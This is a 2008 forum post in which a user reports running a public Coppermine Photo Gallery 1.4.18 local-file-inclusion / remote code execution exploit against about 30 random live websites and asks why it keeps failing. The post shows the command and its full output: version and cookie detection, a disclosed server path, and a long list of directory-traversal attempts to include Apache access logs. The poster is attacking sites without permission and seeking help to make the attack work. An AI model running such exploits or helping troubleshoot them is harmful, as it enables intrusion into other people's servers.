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www.waraxe.us Forum Index -> Coppermine Photo Gallery -> Coppermine <= 1.4.18 LFI / Remote Code Execution
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Coppermine <= 1.4.18 LFI / Remote Code Execution
PostPosted: Fri Aug 01, 2008 5:51 am Reply with quote
Active user
Active user
Joined: May 26, 2008
Posts: 27


Has anyone had any luck with this exploit? I have literally tried about 30 random websites with coppermine and had no success. I don't really know much about coding and this one in particular, but is there something I am missing? Possibly a required addon or plugin that has been installed on the server? I assume milw0rm tests the exploits before they post them so I assume it works somehow... This is basically what I receive everytime although the version, cookie name, and path disclosure are always different for each website of course.

C:\php>php script.php www.*****.com /gallery/

| Coppermine Photo Gallery <= 1.4.18 LFI / Code Execution Exploit by EgiX |

[-] Version..........: 1.4.18
[-] Cookie name......: cpg143
[-] Path disclosure..: /home/johnny/public_html/gallery/

[-] Trying to include ../../apache/logs/access.log
[-] Trying to include ../../apache2/logs/access.log
[-] Trying to include ../../apache/log/access.log
[-] Trying to include ../../apache2/log/access.log
[-] Trying to include ../../logs/access.log
[-] Trying to include ../../var/log/apache/access.log
[-] Trying to include ../../var/log/apache2/access.log
[-] Trying to include ../../var/log/access.log
[-] Trying to include ../../var/www/logs/access.log
[-] Trying to include ../../var/www/log/access.log
[-] Trying to include ../../var/log/httpd/access.log
[-] Trying to include ../../etc/httpd/logs/access.log
[-] Trying to include ../../usr/local/apache/logs/access.log
[-] Trying to include ../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../apache/logs/access.log
[-] Trying to include ../../../apache2/logs/access.log
[-] Trying to include ../../../apache/log/access.log
[-] Trying to include ../../../apache2/log/access.log
[-] Trying to include ../../../logs/access.log
[-] Trying to include ../../../var/log/apache/access.log
[-] Trying to include ../../../var/log/apache2/access.log
[-] Trying to include ../../../var/log/access.log
[-] Trying to include ../../../var/www/logs/access.log
[-] Trying to include ../../../var/www/log/access.log
[-] Trying to include ../../../var/log/httpd/access.log
[-] Trying to include ../../../etc/httpd/logs/access.log
[-] Trying to include ../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../../apache/logs/access.log
[-] Trying to include ../../../../apache2/logs/access.log
[-] Trying to include ../../../../apache/log/access.log
[-] Trying to include ../../../../apache2/log/access.log
[-] Trying to include ../../../../logs/access.log
[-] Trying to include ../../../../var/log/apache/access.log
[-] Trying to include ../../../../var/log/apache2/access.log
[-] Trying to include ../../../../var/log/access.log
[-] Trying to include ../../../../var/www/logs/access.log
[-] Trying to include ../../../../var/www/log/access.log
[-] Trying to include ../../../../var/log/httpd/access.log
[-] Trying to include ../../../../etc/httpd/logs/access.log
[-] Trying to include ../../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../../../apache/logs/access.log
[-] Trying to include ../../../../../apache2/logs/access.log
[-] Trying to include ../../../../../apache/log/access.log
[-] Trying to include ../../../../../apache2/log/access.log
[-] Trying to include ../../../../../logs/access.log
[-] Trying to include ../../../../../var/log/apache/access.log
[-] Trying to include ../../../../../var/log/apache2/access.log
[-] Trying to include ../../../../../var/log/access.log
[-] Trying to include ../../../../../var/www/logs/access.log
[-] Trying to include ../../../../../var/www/log/access.log
[-] Trying to include ../../../../../var/log/httpd/access.log
[-] Trying to include ../../../../../etc/httpd/logs/access.log
[-] Trying to include ../../../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../../../../apache/logs/access.log
[-] Trying to include ../../../../../../apache2/logs/access.log
[-] Trying to include ../../../../../../apache/log/access.log
[-] Trying to include ../../../../../../apache2/log/access.log
[-] Trying to include ../../../../../../logs/access.log
[-] Trying to include ../../../../../../var/log/apache/access.log
[-] Trying to include ../../../../../../var/log/apache2/access.log
[-] Trying to include ../../../../../../var/log/access.log
[-] Trying to include ../../../../../../var/www/logs/access.log
[-] Trying to include ../../../../../../var/www/log/access.log
[-] Trying to include ../../../../../../var/log/httpd/access.log
[-] Trying to include ../../../../../../etc/httpd/logs/access.log
[-] Trying to include ../../../../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../../../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../../../../../apache/logs/access.log
[-] Trying to include ../../../../../../../apache2/logs/access.log
[-] Trying to include ../../../../../../../apache/log/access.log
[-] Trying to include ../../../../../../../apache2/log/access.log
[-] Trying to include ../../../../../../../logs/access.log
[-] Trying to include ../../../../../../../var/log/apache/access.log
[-] Trying to include ../../../../../../../var/log/apache2/access.log
[-] Trying to include ../../../../../../../var/log/access.log
[-] Trying to include ../../../../../../../var/www/logs/access.log
[-] Trying to include ../../../../../../../var/www/log/access.log
[-] Trying to include ../../../../../../../var/log/httpd/access.log
[-] Trying to include ../../../../../../../etc/httpd/logs/access.log
[-] Trying to include ../../../../../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../../../../../usr/local/apache2/logs/access.log
[-] Trying to include ../../../../../../../../apache/logs/access.log
[-] Trying to include ../../../../../../../../apache2/logs/access.log
[-] Trying to include ../../../../../../../../apache/log/access.log
[-] Trying to include ../../../../../../../../apache2/log/access.log
[-] Trying to include ../../../../../../../../logs/access.log
[-] Trying to include ../../../../../../../../var/log/apache/access.log
[-] Trying to include ../../../../../../../../var/log/apache2/access.log
[-] Trying to include ../../../../../../../../var/log/access.log
[-] Trying to include ../../../../../../../../var/www/logs/access.log
[-] Trying to include ../../../../../../../../var/www/log/access.log
[-] Trying to include ../../../../../../../../var/log/httpd/access.log
[-] Trying to include ../../../../../../../../etc/httpd/logs/access.log
[-] Trying to include ../../../../../../../../usr/local/apache/logs/access.log
[-] Trying to include ../../../../../../../../usr/local/apache2/logs/access.log

[-] Exploit failed...
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Coppermine <= 1.4.18 LFI / Remote Code Execution
  www.waraxe.us Forum Index -> Coppermine Photo Gallery
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